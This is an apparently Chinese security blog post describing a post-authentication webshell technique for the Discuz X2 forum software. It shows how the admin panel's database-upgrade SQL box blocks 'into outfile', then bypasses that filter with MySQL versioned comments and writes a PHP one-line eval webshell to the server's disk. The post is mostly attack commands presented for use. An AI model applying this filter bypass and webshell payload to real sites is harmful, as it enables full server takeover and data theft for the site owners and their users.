当前位置:首页 >> 网络通讯 >> 网络安全 >> 内容

Discuz X2后台getshell 鸡肋

时间:2013/4/19 12:10:00 作者:平凡之路 来源:xuhantao.com 浏览:

最近帮朋友看了一个站,DZx2的,拿到了创始人都没办法getshell 

 

百度无果,自己本地架设了一下 

  搜狗电脑知识技巧

1,当mysql是root时 

 

站长---数据库---升级 

 

尝试 

 

select '1' into outfile 'E:\2.txt' 

 

会提示 

 

    [Type] 查询语句安全威胁 

 

    [Query] select '1' into outfile 'E:\2.txt' 

 

为什么会这样呢? 

 

\config\config_global.php中 

 

限制了into outfile函数 

 

尝试绕过  

 

/*!select*/ '1' /*!into outfile*/ 'E:\3.txt' 

 

Discuz! 数据结构升级成功,影响的记录行数 1 

 

如果要导出一句话,即 

 

/*!select*/ '<?php @eval($_POST[cmd]);?>' /*!into outfile*/ 'E:\3.php' 

 

注意:一句话密码不要有引号 

 

相关文章
  • 没有相关文章
共有评论 0相关评论
发表我的评论
  • 大名:
  • 内容:
  • 徐汉涛(www.xuhantao.com) © 2024 版权所有 All Rights Reserved.
  • 部分内容来自网络,如有侵权请联系站长尽快处理 站长QQ:965898558(广告及站内业务受理) 网站备案号:蒙ICP备15000590号-1